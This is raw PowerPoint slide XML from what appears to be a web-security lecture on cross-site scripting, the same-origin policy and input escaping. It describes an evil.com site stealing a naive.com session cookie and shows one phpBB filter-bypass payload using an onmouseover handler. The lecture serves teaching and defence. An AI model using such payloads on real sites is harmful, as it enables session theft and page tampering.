          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7212013" y="1676400"/>
            <a:ext cx="1550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naive.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21448750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8501" grpId="0" animBg="1"/>
      <p:bldP spid="1258502" grpId="0" animBg="1"/>
      <p:bldP spid="1258513" grpId="0" animBg="1"/>
      <p:bldP spid="12585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So What?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4577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Why would user click on such a link?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Phishing email in webmail client (e.g., Gmail)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Link in DoubleClick banner ad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>…  many many ways to fool user into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>clicking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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So what if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> gets cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Cookie can include session authenticator for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Or other data intended only for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>naive.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>Violates the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t> of the same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:sym typeface="Symbol" charset="0"/>
            </a:endParaRP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FAB900A3-DC07-474D-9D99-68FF90BAA6F4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37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948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0992470B-D40A-7F4F-8B1F-81A94267AD05}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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6400" y="1303866"/>
            <a:ext cx="8509000" cy="5173133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XSS is a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>reflection attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>User is tricked into visiting a badly written website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>A bug in website code causes it to display and the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>s browser to execute an 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arbitrary attack script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Can change contents of the affected website by manipulating DOM components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Show bogus information, request sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Control form fields on this page and linked pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>MySpace.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> phishing attack injects password field that sends password to bad guy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Can cause user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>s browser to attack other websites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128000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Other XSS Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182174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5F919825-4FF0-9C41-81F9-72BBADD3E2CB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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6482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Hidden in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>user-created content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Social sites (e.g., MySpace), blogs, forums, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>wikis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>When visitor loads the page, webserver displays the content and visitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>s browser executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Many sites try to filter out scripts from user content, but this is difficult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Where Malicious Scripts Lurk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6738042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790A231C-BC2D-1349-96C4-DEBB98DD6A98}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial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458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Runs on a Web server or application server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Takes input from Web users (via Web server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Interacts with back-end databases and third parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Prepares and outputs results for users (via Web server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Dynamically generated HTML pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Contain content from many different sources, often including regular users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Blogs, social networks, photo-sharing websites…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Typical Web Application Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31230666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9D249650-4C4C-E145-A632-64BDA5B40DD7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin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5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Preventing injection of scripts into HTML is hard!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Blocking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Event handlers, stylesheets, encoded inputs (%3C), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>phpBB allowed simple HTML tags like &lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&lt;b c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> onmouseover=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> x=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&gt;Hello&lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Any user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> be preprocessed before it is used inside HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>In PHP, htmlspecialchars(string) will replace all special characters with their HTML codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> becomes &amp;#039;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> becomes &amp;quot; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> becomes &amp;amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>In ASP.NET, Server.HtmlEncode(string)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Preventing Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19489473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F0AF72DD-AC3A-3B44-B7FF-C3340791E1D6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial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051800" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Browser and Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Tahoma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685800" y="3316288"/>
            <a:ext cx="1905000" cy="1103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7173" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="2133600"/>
            <a:ext cx="3048000" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -138125"/>
              <a:gd name="adj2" fmla="val 535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</a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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7174" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2647950" y="4419600"/>
            <a:ext cx="3200400" cy="22606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Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3495675"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 2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18" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBez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Oval 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6892925" y="3752850"/>
            <a:ext cx="365125" cy="365125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685800" y="4419600"/>
            <a:ext cx="1905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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS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685800" y="4876800"/>
            <a:ext cx="1905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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware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6677025" y="3336925"/>
            <a:ext cx="1095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website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7180" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3797300"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 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12" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
